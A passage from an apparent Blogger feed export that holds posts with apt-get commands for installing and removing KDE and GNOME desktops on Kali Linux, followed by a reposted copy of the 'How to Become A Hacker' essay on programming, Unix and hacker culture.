15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;# How to install KDE Plasma Desktop Environment in Kali Linux:&lt;/span&gt;&lt;br /&gt;
&lt;pre style=&quot;background-color: white; color: #333333; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;&lt;code&gt;apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop&lt;/code&gt;&lt;/pre&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;# How to install Netbook KDE Plasma Desktop Environment in Kali Linux:&lt;/span&gt;&lt;br /&gt;
&lt;pre style=&quot;background-color: white; color: #333333; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;&lt;code&gt;apt-get install kali-defaults kali-root-login desktop-base kde-plasma-netbook&lt;/code&gt;&lt;/pre&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;# How to install Standard Debian selected packages and frameworks in Kali Linux:&lt;/span&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;code style=&quot;background-color: white; color: #333333; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;apt-get install kali-defaults kali-root-login desktop-base kde-standard&lt;/code&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;# How to install KDE Full Install in Kali Linux:&lt;/span&gt;&lt;br /&gt;
&lt;pre style=&quot;background-color: white; color: #333333; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;&lt;code&gt;apt-get install kali-defaults kali-root-login desktop-base kde-full&lt;/code&gt;&lt;/pre&gt;
&lt;br style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot; /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;# How to remove KDE on Kali Linux:&lt;/span&gt;&lt;br /&gt;
&lt;pre style=&quot;background-color: white; color: #333333; font-size: 15px; line-height: 20.790000915527344px;&quot;&gt;&lt;code&gt;apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/2579046514588713224/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/how-to-installremove-different-kde.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2579046514588713224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2579046514588713224'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/how-to-installremove-different-kde.html' title='How to install/remove different KDE Desktop Environments in Kali Linux'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-2588188757225023754</id><published>2014-03-31T12:18:00.001+05:30</published><updated>2014-03-31T12:20:25.221+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Kali Linux"/><category scheme="http://www.blogger.com/atom/ns#" term="Unix/Linux"/><title type='text'>How to install/remove GNOME Desktop Environment on Kali Linux</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot; style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 18px; font-weight: normal; margin: 0px; position: relative;&quot;&gt;
&lt;/h3&gt;
&lt;div class=&quot;post-header&quot; style=&quot;color: #999999; line-height: 1.6; margin: 0px 0px 1.5em;&quot;&gt;
&lt;div class=&quot;post-header-line-1&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;post-body entry-content&quot; id=&quot;post-body-5668171306767052186&quot; itemprop=&quot;articleBody&quot; style=&quot;font-size: 15px; line-height: 1.4; position: relative; width: 808px;&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 20.790000915527344px;&quot; trbidi=&quot;on&quot;&gt;
&lt;div&gt;
&lt;h3 style=&quot;margin: 0px; position: relative;&quot;&gt;
&lt;a class=&quot;grouped_elements&quot; href=&quot;http://i0.wp.com/www.blackmoreops.com/wp-content/uploads/2013/10/big20gnome20logo-100014312-large.png&quot; rel=&quot;tc-fancybox-group298&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot;&gt;&lt;img alt=&quot;Gnome Desktop Logo - blackMORE Ops&quot; class=&quot;alignnone  wp-image-10&quot; src=&quot;http://i0.wp.com/www.blackmoreops.com/wp-content/uploads/2013/10/big20gnome20logo-100014312-large.png?resize=193%2C210&quot; data-recalc-dims=&quot;1&quot; style=&quot;border: none; position: relative;&quot; /&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;br /&gt;
&lt;h3 style=&quot;margin: 0px; position: relative;&quot;&gt;
How to install/remove GNOME Desktop Environment on Kali Linux&lt;/h3&gt;
&lt;/div&gt;
GNOME is a desktop environment and graphical user interface that runs on top of a computer operating system. It is composed entirely of free and open source software and is developed by both volunteers and paid contributors, the largest corporate contributor being Red Hat. It is an international project that includes creating software development frameworks, selecting application software for the desktop, and working on the programs that manage application launching, file handling, and window and task management.&lt;br /&gt;
Initially, “GNOME” was an acronym of GNU Network Object Model Environment, referring to the original intention of creating a distributed object framework similar to Microsoft’s OLE; it was dropped, because this no longer reflects the core vision of the GNOME project.&lt;br /&gt;
The GNOME project provides two things: The GNOME desktop environment, a graphical user interface and core applications like Web, a simple web browser; and the GNOME development platform, an extensive framework for building applications that integrate into the rest of the desktop and mobile user interface.&lt;br /&gt;
&lt;div style=&quot;clear: both; margin-bottom: 10px; margin-top: 2px; padding-bottom: 10px; padding-top: 2px;&quot;&gt;
&lt;center&gt;
&lt;ins class=&quot;adsbygoogle&quot; data-ad-client=&quot;ca-pub-5985721093179725&quot; data-ad-slot=&quot;6964041491&quot; data-adsbygoogle-status=&quot;done&quot; style=&quot;display: inline-block; height: 15px; width: 468px;&quot;&gt;&lt;ins style=&quot;background-color: transparent; border: none; display: inline-table; height: 15px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;ins id=&quot;aswift_2_anchor&quot; style=&quot;background-color: transparent; border: none; display: block; height: 15px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;/ins&gt;&lt;/ins&gt;&lt;/center&gt;
&lt;/div&gt;
&lt;a class=&quot;grouped_elements&quot; href=&quot;http://i0.wp.com/www.blackmoreops.com/wp-content/uploads/2013/10/How-to-install-remove-GNOME-Desktop-Environment-on-Kali-Linux-blackMORE-Ops.jpg&quot; rel=&quot;tc-fancybox-group298&quot; style=&quot;border: 0px; color: #6699cc; text-decoration: none;&quot;&gt;&lt;img alt=&quot;How to install remove GNOME Desktop Environment on Kali Linux - blackMORE Ops&quot; class=&quot;alignnone size-full wp-image-747&quot; src=&quot;http://i0.wp.com/www.blackmoreops.com/wp-content/uploads/2013/10/How-to-install-remove-GNOME-Desktop-Environment-on-Kali-Linux-blackMORE-Ops.jpg?resize=1170%2C658&quot; data-recalc-dims=&quot;1&quot; height=&quot;359&quot; style=&quot;border: none; position: relative;&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style=&quot;clear: both; margin-bottom: 10px; margin-top: 2px; padding-bottom: 10px; padding-top: 2px;&quot;&gt;
&lt;center&gt;
&lt;ins class=&quot;adsbygoogle&quot; data-ad-client=&quot;ca-pub-5985721093179725&quot; data-ad-slot=&quot;6964041491&quot; data-adsbygoogle-status=&quot;done&quot; style=&quot;display: inline-block; height: 15px; width: 468px;&quot;&gt;&lt;ins style=&quot;background-color: transparent; border: none; display: inline-table; height: 15px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;ins id=&quot;aswift_3_anchor&quot; style=&quot;background-color: transparent; border: none; display: block; height: 15px; margin: 0px; padding: 0px; position: relative; visibility: visible; width: 468px;&quot;&gt;&lt;/ins&gt;&lt;/ins&gt;&lt;/ins&gt;&lt;/center&gt;
&lt;/div&gt;
&lt;h3 style=&quot;margin: 0px; position: relative;&quot;&gt;
How to install GNOME&amp;nbsp;Desktop Environment on Kali Linux&lt;/h3&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;apt-get install gnome-core kali-defaults kali-root-login desktop-base&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3 style=&quot;margin: 0px; position: relative;&quot;&gt;
How to remove GNOME&amp;nbsp;Desktop Environment on Kali Linux&lt;/h3&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;apt-get remove gnome-core&lt;/code&gt;&lt;/pre&gt;
&lt;div&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; clear: both; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 20.790000915527344px;&quot;&gt;
&lt;/div&gt;
&lt;div id=&quot;lws_0&quot; style=&quot;background-color: white; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 20.790000915527344px;&quot;&gt;
&lt;div class=&quot;linkwithin_outer&quot; style=&quot;border: 0px; clear: both; margin: 0px; padding: 0px;&quot;&gt;
&lt;div class=&quot;linkwithin_inner&quot; id=&quot;linkwithin_inner&quot; style=&quot;border: 0px; margin: 0px; padding: 0px; width: 596px;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/2588188757225023754/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/how-to-installremove-gnome-desktop.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2588188757225023754'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/2588188757225023754'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/03/how-to-installremove-gnome-desktop.html' title='How to install/remove GNOME Desktop Environment on Kali Linux'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-1238338563913377204</id><published>2014-02-19T18:55:00.001+05:30</published><updated>2014-02-19T18:55:31.843+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><title type='text'>How to Become A Hacker</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;What is a Hacker?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
The&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.catb.org/jargon&quot; target=&quot;_top&quot;&gt;Jargon File&lt;/a&gt;&amp;nbsp;contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;become&lt;/em&gt;&lt;/span&gt;&amp;nbsp;a hacker, though, only two are really relevant.&lt;br /&gt;
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you&#39;re a hacker.&lt;br /&gt;
The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.&lt;br /&gt;
There is another group of people who loudly call themselves hackers, but aren&#39;t. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn&#39;t make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.&lt;br /&gt;
The basic difference is this: hackers build things, crackers break them.&lt;br /&gt;
If you want to be a hacker, keep reading. If you want to be a cracker, go read the&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;news:alt.2600&quot; target=&quot;_top&quot;&gt;alt.2600&lt;/a&gt;&amp;nbsp;newsgroup and get ready to do five to ten in the slammer after finding out you aren&#39;t as smart as you think you are. And that&#39;s all I&#39;m going to say about crackers.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Basic Hacking Skills&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there&#39;s a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one.&lt;br /&gt;
This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn&#39;t until recently involve HTML. But right now it pretty clearly includes the following:&lt;br /&gt;
&lt;div class=&quot;sect2&quot; title=&quot;1. Learn how to program.&quot;&gt;
&lt;div class=&quot;titlepage&quot;&gt;
&lt;h3 class=&quot;title&quot; style=&quot;font-family: Helvetica, Univers, sans-serif;&quot;&gt;
&lt;a href=&quot;&quot; id=&quot;skills1&quot;&gt;&lt;/a&gt;1. Learn how to program.&lt;/h3&gt;
&lt;/div&gt;
This, of course, is the fundamental hacking skill. If you don&#39;t know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.linuxjournal.com/article.php?sid=3882&quot; target=&quot;_top&quot;&gt;evaluation of Python&lt;/a&gt;. Good&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://docs.python.org/tut/tut.html&quot; target=&quot;_top&quot;&gt;tutorials&lt;/a&gt;&amp;nbsp;are available at the&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://docs.python.org/tutorial/&quot; target=&quot;_top&quot;&gt;Python web site&lt;/a&gt;.&lt;br /&gt;
I used to recommend Java as a good language to learn early, but&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.crosstalkonline.org/storage/issue-archives/2008/200801/200801-Dewar.pdf&quot; target=&quot;_top&quot;&gt;this critique&lt;/a&gt;&amp;nbsp;has changed my mind (search for&amp;nbsp;&lt;span class=&quot;quote&quot;&gt;“&lt;span class=&quot;quote&quot;&gt;The Pitfalls of Java as a First Programming Language&lt;/span&gt;”&lt;/span&gt;&amp;nbsp;within it). A hacker cannot, as they devastatingly put it&lt;span class=&quot;quote&quot;&gt;“&lt;span class=&quot;quote&quot;&gt;approach problem-solving like a plumber in a hardware store&lt;/span&gt;”&lt;/span&gt;; you have to know what the components actually&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;do&lt;/em&gt;&lt;/span&gt;. Now I think it is probably best to learn C and Lisp first, then Java.&lt;br /&gt;
There is perhaps a more general point here. If a language does too much for you, it may be simultaneously a good tool for production and a bad one for learning. It&#39;s not only languages that have this problem; web application frameworks like RubyOnRails, CakePHP, Django may make it too easy to reach a superficial sort of understanding that will leave you without resources when you have to tackle a hard problem, or even just debug the solution to an easy one.&lt;br /&gt;
If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be.&lt;br /&gt;
C is very efficient, and very sparing of your machine&#39;s resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today&#39;s machines as powerful as they are, this is usually a bad tradeoff — it&#39;s smarter to use a language that uses the machine&#39;s time less efficiently, but your time much&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;more&lt;/em&gt;&lt;/span&gt;&amp;nbsp;efficiently. Thus, Python.&lt;br /&gt;
Other languages of particular importance to hackers include&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.perl.com/&quot; target=&quot;_top&quot;&gt;Perl&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.lisp.org/&quot; target=&quot;_top&quot;&gt;LISP&lt;/a&gt;. Perl is worth learning for practical reasons; it&#39;s very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don&#39;t require C&#39;s machine efficiency. You will need to be able to understand their code.&lt;br /&gt;
LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor, or Script-Fu plugins for the GIMP.)&lt;br /&gt;
It&#39;s best, actually, to learn all five of Python, C/C++, Java, Perl, and LISP. Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways.&lt;br /&gt;
But be aware that you won&#39;t reach the skill level of a hacker or even merely a programmer simply by accumulating languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what&#39;s in the manual to what you already know. This means you should learn several very different languages.&lt;br /&gt;
I can&#39;t give complete instructions on how to learn to program here — it&#39;s a complex skill. But I can tell you that books and courses won&#39;t do it — many, maybe&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;most&lt;/em&gt;&lt;/span&gt;&amp;nbsp;of the best hackers are self-taught. You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a)&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;reading code&lt;/em&gt;&lt;/span&gt;&amp;nbsp;and (b)&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;writing code&lt;/em&gt;&lt;/span&gt;.&lt;br /&gt;
Peter Norvig, who is one of Google&#39;s top hackers and the co-author of the most widely used textbook on AI, has written an excellent essay called&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://norvig.com/21-days.html&quot; target=&quot;_top&quot;&gt;Teach Yourself Programming in Ten Years&lt;/a&gt;. His &quot;recipe for programming success&quot; is worth careful attention.&lt;br /&gt;
Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models.&lt;br /&gt;
Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic...&lt;/div&gt;
&lt;div class=&quot;sect2&quot; title=&quot;2. Get one of the open-source Unixes and learn to use and run it.&quot;&gt;
&lt;div class=&quot;titlepage&quot;&gt;
&lt;h3 class=&quot;title&quot; style=&quot;font-family: Helvetica, Univers, sans-serif;&quot;&gt;
&lt;a href=&quot;&quot; id=&quot;skills2&quot;&gt;&lt;/a&gt;2. Get one of the open-source Unixes and learn to use and run it.&lt;/h3&gt;
&lt;/div&gt;
I&#39;ll assume you have a personal computer or can get access to one. (Take a moment to appreciate how much that means. The hacker culture originally evolved back when computers were so expensive that individuals could not own them.) The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.&lt;br /&gt;
Yes, there are other operating systems in the world besides Unix. But they&#39;re distributed in binary — you can&#39;t read the code, and you can&#39;t modify it. Trying to learn to hack on a Microsoft Windows machine or under any other closed-source system is like trying to learn to dance while wearing a body cast.&lt;br /&gt;
Under Mac OS X it&#39;s possible, but only part of the system is open source — you&#39;re likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple&#39;s proprietary code. If you concentrate on the Unix under the hood you can learn some useful things.&lt;br /&gt;
Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can&#39;t be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn&#39;t always true, and some old-time hackers still aren&#39;t happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft&#39;s muscle doesn&#39;t seem able to seriously dent it.)&lt;br /&gt;
So, bring up a Unix — I like Linux myself but there are other ways (and yes, you&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;can&lt;/em&gt;&lt;/span&gt;&amp;nbsp;run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You&#39;ll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you&#39;ll have fun, and you&#39;ll soak up more knowledge than you realize you&#39;re learning until you look back on it as a master hacker.&lt;br /&gt;
For more about learning Unix, see&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://catb.org/~esr/faqs/loginataka.html&quot; target=&quot;_top&quot;&gt;The Loginataka&lt;/a&gt;. You might also want to have a look at&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://catb.org/~esr/writings/taoup/&quot; target=&quot;_top&quot;&gt;The Art Of Unix Programming&lt;/a&gt;.&lt;br /&gt;
To get your hands on a Linux, see the&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.linux.org/&quot; target=&quot;_top&quot;&gt;Linux Online!&lt;/a&gt;&amp;nbsp;site; you can download from there or (better idea) find a local Linux user group to help you with installation.&lt;br /&gt;
During the first ten years of this HOWTO&#39;s life, I reported that from a new user&#39;s point of view, all Linux distributions are almost equivalent. But in 2006-2007, an actual best choice emerged:&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.ubuntu.com/&quot; target=&quot;_top&quot;&gt;Ubuntu&lt;/a&gt;. While other distros have their own areas of strength, Ubuntu is far and away the most accessible to Linux newbies. Beware, though, of the hideous and nigh-unusable &quot;Unity&quot; desktop interface that Ubuntu introduced as a default a few years later; the Xubuntu or Kubuntu variants are better.&lt;br /&gt;
You can find BSD Unix help and resources at&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.bsd.org/&quot; target=&quot;_top&quot;&gt;www.bsd.org&lt;/a&gt;.&lt;br /&gt;
A good way to dip your toes in the water is to boot up what Linux fans call a&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://www.livecdnews.com/&quot; target=&quot;_top&quot;&gt;live CD&lt;/a&gt;, a distribution that runs entirely off a CD without having to modify your hard disk. This will be slow, because CDs are slow, but it&#39;s a way to get a look at the possibilities without having to do anything drastic.&lt;br /&gt;
I have written a primer on the&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://en.tldp.org/HOWTO/Unix-and-Internet-Fundamentals-HOWTO/index.html&quot; target=&quot;_top&quot;&gt;basics of Unix and the Internet&lt;/a&gt;.&lt;br /&gt;
I used to recommend against installing either Linux or BSD as a solo project if you&#39;re a newbie. Nowadays the installers have gotten good enough that doing it entirely on your own is possible, even for a newbie. Nevertheless, I still recommend making contact with your local Linux user&#39;s group and asking for help. It can&#39;t hurt, and may smooth the process.&lt;/div&gt;
&lt;div class=&quot;sect2&quot; title=&quot;3. Learn how to use the World Wide Web and write HTML.&quot;&gt;
&lt;div class=&quot;titlepage&quot;&gt;
&lt;h3 class=&quot;title&quot; style=&quot;font-family: Helvetica, Univers, sans-serif;&quot;&gt;
&lt;a href=&quot;&quot; id=&quot;skills3&quot;&gt;&lt;/a&gt;3. Learn how to use the World Wide Web and write HTML.&lt;/h3&gt;
&lt;/div&gt;
Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;politicians&lt;/em&gt;&lt;/span&gt;&amp;nbsp;admit has changed the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web.&lt;br /&gt;
This doesn&#39;t just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web&#39;s markup language. If you don&#39;t know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web;&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://htmldog.com/&quot; target=&quot;_top&quot;&gt;here&#39;s one&lt;/a&gt;.)&lt;br /&gt;
But just having a home page isn&#39;t anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see&amp;nbsp;&lt;a class=&quot;ulink&quot; href=&quot;http://catb.org/~esr/html-hell.html&quot; target=&quot;_top&quot;&gt;The HTML Hell Page&lt;/a&gt;).&lt;br /&gt;
To be worthwhile, your page must have&amp;nbsp;&lt;span class=&quot;emphasis&quot;&gt;&lt;em&gt;content&lt;/em&gt;&lt;/span&gt;&amp;nbsp;— it must be interesting and/or useful to other hackers. And that brings us to the next topic...&lt;/div&gt;
&lt;div class=&quot;sect2&quot; title=&quot;4. If you don&#39;t have functional English, learn it.&quot;&gt;
&lt;div class=&quot;titlepage&quot;&gt;
&lt;h3 class=&quot;title&quot; style=&quot;font-family: Helvetica, Univers, sans-serif;&quot;&gt;
&lt;a href=&quot;&quot; id=&quot;skills4&quot;&gt;&lt;/a&gt;4. If you don&#39;t have functional English, learn it.&lt;/h3&gt;
&lt;/div&gt;
As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community.&lt;br /&gt;
Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all).&lt;br /&gt;
